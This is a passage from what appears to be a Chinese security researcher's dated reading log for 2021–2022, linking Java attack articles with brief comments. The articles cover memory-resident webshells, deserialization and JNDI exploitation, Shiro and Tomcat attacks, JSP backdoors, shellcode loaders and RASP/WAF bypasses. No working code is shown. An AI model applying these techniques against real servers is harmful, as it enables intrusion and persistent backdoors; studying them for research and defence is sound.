[闲谈log4j2](闲谈log4j2.md) ++ 2021/12/19 [SPI机制](SPI机制.md) ++ 2021/12/21 [从一个被Tomcat拒绝的漏洞到特殊内存马](https://xz.aliyun.com/t/10577) **简单的说就是Tomcat启动时会加载lib下的依赖jar,如果黑客通过上传漏洞或者反序列化漏洞在这个目录添加一个jar,重启后,某些情况下这个jar会被当成正常库来加载,在一定条件下造成RCE** 这个功能是非常正常的因为中间件的类加载机制不是双亲委派机制.都是自己实现的 ++ 2021/12/23 [寻找复杂对象的属性值](searchobj.md) **是在使用object-searcher的时候想到了,于是去学习了一下在java中通过递归去寻找复杂对象的属性。** ++ 2021/12/29 [jps命令](https://www.cnblogs.com/keystone/p/10789382.html) **其中可以支持远程调用并且默认情况下, jstatd开启在1099 端口上开启RMI服务器,rmi服务?想到了什么!** ++ 2021/12/30 [浅谈Log4j2不借助dnslog的检测](https://xz.aliyun.com/t/10676) **还得是大哥,思路太棒了,通过tcp数据传输的方面来验证漏洞。。学习!** ++ 2021/12/31 [构造java探测class反序列化gadget的思考](构造java探测class反序列化gadget的思考.md) **2021 新年快乐** + +## 2022 ++ 2022/01/07 [GadgetProbe:利用反序列化来暴力破解远程类路径](https://bishopfox.com/blog/gadgetprobe) **和构造java探测class反序列化gadget的思考思路是一样的** ++ 2022/01/08 [目录穿越上传](https://github.com/metersphere/metersphere/issues/8653) **tw上有一个后台上传jar插件进行getshell的** ++ 2022/01/08 [关于 Java 中的 RMI-IIOP](https://paper.seebug.org/1105/) **没有这么看懂。23333** ++ 2022/01/08 [你了解 SpringBoot java -jar 的启动原理吗?](https://xie.infoq.cn/article/765f324659d44a5e1eae1ee0c) ++ 2022/01/08 [c语言能不能实现agent?](c语言能实现agent%3F!.md) **通过编写c语言代码去实现agent** **实现了通用的代码https://gist.github.com/Firebasky/c1efd9dc7eb964a77cb788c170a8598f** ++ 2022/01/09 [瞒天过海计之Tomcat隐藏内存马](https://tttang.com/archive/1368/) 思路是[从一个被Tomcat拒绝的漏洞到特殊内存马](https://xz.aliyun.com/t/10577)中不过使用了agent去实现并且工具化了,太猛了(有空学习一下ysomap。。。。 ++ 2022/01/09 [入侵JVM?Java Agent原理浅析和实践中](https://blog.csdn.net/CringKong/article/details/120840827) ++ 2022/01/09 [Java内存攻击技术漫谈](https://xz.aliyun.com/t/10075) **神仙级别的文章,还没有看完23333,慢慢消化** ++ 2022/01/09 [解决agent中tools加载的问题](解决agent中tools加载的问题.md) **学习思路** ++ 2022/01/10 [unsafe学习](unsafe学习.md) **可以用来bypass 反射filter** ++ 2022/01/14 [CVE-2021-45456ApacheKylin命令注入分析补充](CVE-2021-45456ApacheKylin命令注入分析补充.md) **对2次函数的处理出现了问题** ++ 2022/01/15 [wJa无源码的源码级调试jar包](https://www.freebuf.com/sectool/318013.html) **这个工具好像是比较新?还没有使用过** [bilibil视频](https://www.bilibili.com/video/BV19m4y1Q75X/) ++ 2022/01/15 [使用 Yakit 打破 Java 序列化协议语言隔离](https://www.freebuf.com/sectool/318064.html) **比较好从字节码的方向出发方向,之前写gormi的时候也遇到了这个问题** ++ 2022/01/15 [CVE 2021 43287分析](CVE-2021-43287.md) ++ 2022/01/16 [探索高版本 JDK 下 JNDI 漏洞的利用方法](https://tttang.com/archive/1405) **不愧是浅蓝师傅,非常好的文章** [JNDI jdk高版本绕过—— Druid](https://xz.aliyun.com/u/23823) **都是根据本地的Factory类去寻找的** **自己使用ast实现了去寻找的功能。。。** ++ 2022/01/18 [一次jsp上传绕过的思考 --yzddMr6](https://www.jianshu.com/p/c0c566de4e97) **感觉自己需要去详细的了解一下jsp** [jsp标签绕过](jsp标签绕过.md) ++ 2022/01/20 [Tomcat URL解析差异性及利用](http://www.mi1k7ea.com/2020/04/01/Tomcat-URL%E8%A7%A3%E6%9E%90%E5%B7%AE%E5%BC%82%E6%80%A7%E5%8F%8A%E5%88%A9%E7%94%A8/) **Tomcat对`/;xxx/`以及`/./`的处理是包容的、对`/../`会进行跨目录拼接处理** [tomcat容器url解析特性研究](https://xz.aliyun.com/t/10799) ++ 2022/01/20 [微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) [exp](https://github.com/0730Nophone/E-cology-WorkflowServiceXml-) ++ 2022/01/21 [使用JVMTI技术解密class文件](https://landgrey.me/blog/5/) **JVMTI**去操作类似攻击思想agent加载c原因实现攻击 ++ 2022/01/21 [JSP 包含文件的四种方法](https://landgrey.me/blog/4/) **利用**可以包含非jsp的文件,可以利用来做后门。[jsp include后门文件](https://www.javaweb.org/?p=84) ++ 2022/01/22 [Java Timer 后门](https://www.javaweb.org/?p=544) **只能说思路太厉害了** **Timer 的特性是,如果不是所有未完成的任务都已完成执行,或不调用 Timer 对象的cancel 方法,这个线程是不会停止,也不会被 GC 的,因此,这个任务会一直执行下去,直到应用关闭。** ++ 2022/01/23 [用Java 调试协议JDWP(Java DEbugger Wire Protocol) 弹shell](https://www.javaweb.org/?p=1875) **之前面试问到了内网中存在的比较多** ++ 2022/01/23 [JAVA虚拟机关闭钩子(Shutdown Hook)](https://blog.csdn.net/u013256816/article/details/50394923) **可用在jvm关闭的时候执行奇奇怪怪的存在比如:不死内存木马** ++ 2022/01/24 [浅谈加载字节码相关的Java安全问题](https://xz.aliyun.com/t/10535) **理论上还有其他的加载器。** ++ 2022/01/25 [学习了asm的简单使用](asm.md) [基于污点分析的JSP Webshell检测](https://xz.aliyun.com/t/10622) **其中主要是利用了asm和模拟jvm操作去判断的** [加载恶意字节码Webshell的检测](https://xz.aliyun.com/t/10636) ++ 2022/01/31 [java执行shellcode的几种方法](https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&mid=2247484630&idx=1&sn=5d911558674ba5a210988df35addb3eb&chksm=fa8b194ecdfc9058194a730f280fbf0eb31deaddf1bbdbb135493d593e876b807e6cc14ecae8&mpshare=1&scene=23&srcid=01319e5soHkeMskTioS9UgSt&sharer_sharetime=1643563538758&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) ++ 2022/02/01 [Java环境下通过时间竞争实现DNS Rebinding 绕过SSRF 防御限制](https://mp.weixin.qq.com/s?__biz=MzA4ODc0MTIwMw==&mid=2652533185&idx=1&sn=e960a15c6dd5071b22d615c6fe85ba8c&chksm=8bcb55fdbcbcdcebb1433de02cd3250c4d460e9401581817f15d887d90adcdf5c453ec9c31b1&mpshare=1&scene=23&srcid=0201Tl4H6As13axhsze8JJi9&sharer_sharetime=1643683667134&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **通过条件竞争绕过java默认ttl不为0** ++ 2022/02/02 [The Story of an RCE on a Java Web Application](https://infosecwriteups.com/the-story-of-a-rce-on-a-java-web-application-2e400cddcd1e) ++ 2022/02/04 [深入学习tomcat](深入学习tomcat.md) **清楚了tomcat的流程** ++ 2022/02/07 [Resin解析漏洞分析](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651103763&idx=1&sn=f3147eae969a17bd04e0a6471e2109e0&chksm=8c6b6430bb1ced267d4294a72bc991d2780b2a1521504660a010900319ae637b114c453c3057&mpshare=1&scene=23&srcid=02075OY7BLNDsUwhHiaWDFw4&sharer_sharetime=1644211604502&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **主要出问题的是^.*\.jsp(?=/)部分这个正则的逻辑是匹配xxxx.jsp/xxxx所以我们传入的路径会被匹配到,这也是这个漏洞的本质原因** ++ 2022/02/09 [Java加载动态链接库](http://tttang.com/archive/1436/) **模拟实现加载动态链接库webshell** ++ 2022/02/09 [Tomcat Session(CVE-2020-9484)反序列化漏洞复现](https://www.freebuf.com/vuls/245232.html) [Apache Tomcat权限提升漏洞分析CVE-2022-23181](https://mp.weixin.qq.com/s/sQH0CbiSHdpsoJf7ABPrtA) ++ 2022/02/10 [通过代码执行修改Shiro密钥](https://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247483900&idx=1&sn=af727619a14b4677acb6ddad156524b9&chksm=c2b1038af5c68a9cc5185e1ed9ec0aa13963de3b2853c13fc0bf7a6184ec649cae9b28eda621&mpshare=1&scene=23&srcid=0210HYf3qYA2UnBm9sCrvUGM&sharer_sharetime=1644429131269&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) ++ 2022/02/10 shiro利用head太长解决办法? 1.反射修改headmax值 2.获取request,将post的数据进行classloader加载,加载的内容为动态注册filter内存马。 ++ 2022/02/10 [java调用shell脚本_记一次突破反弹shell](https://blog.csdn.net/weixin_39620845/article/details/111048567) **反弹java socket shell实现不依赖反弹shell环境** ++ 2022/02/10 [OpenRASP 两次绕过](https://mp.weixin.qq.com/s/hkL8VPHnTgFsOCCrNlRpzQ) **1.修改特征值 2.在静态代码里面开启新线程调用恶意方法** ++ 2022/02/21 **java 中存在编译时执行函数(注解的方式执行)** ++ 2022/02/23 [原创 | emoji、shiro与log4j2漏洞](https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ) **通过fuzz报错记录log触发log4j2漏洞** ++ 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** ++ 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** ++ 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** ++ 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** ++ 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** ++ 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** ++ 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** ++ 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** ++ 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** ++ 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) ++ 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** ++ 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** ++ 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) ++ 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** ++ 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** ++ 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** ++ 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** ++ 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) ++ 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** ++ 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** ++ 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** ++ 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** ++ 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** ++ 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) ++ 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) ++ 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** ++ 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** ++ 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** ++ 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** ++ 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) ++ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** ++ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** ++ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** ++ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) ++ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** ++ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** ++ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** ++ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** ++ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** ++ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** ++ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) ++ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** ++ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) ++ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** ++ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** ++ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** ++ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** ++ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** ++ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** ++ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** ++ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** ++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) ++ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** ++ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) ++ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) ++ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** ++ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** ++ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** ++ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** ++ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** ++ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** ++ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) ++ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** ++ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** ++ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) ++ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) ++ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) ++ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) ++ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) ++ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** ++ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** ++ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** ++ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) ++ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** ++ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** ++ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) ++ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) ++ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) ++ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** ++ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) ++ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) ++ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) ++ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) ++ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) ++ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) ++ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 ++ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** ++ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) ++ 2022/11/09 [Bypass Authentication BurpSuit 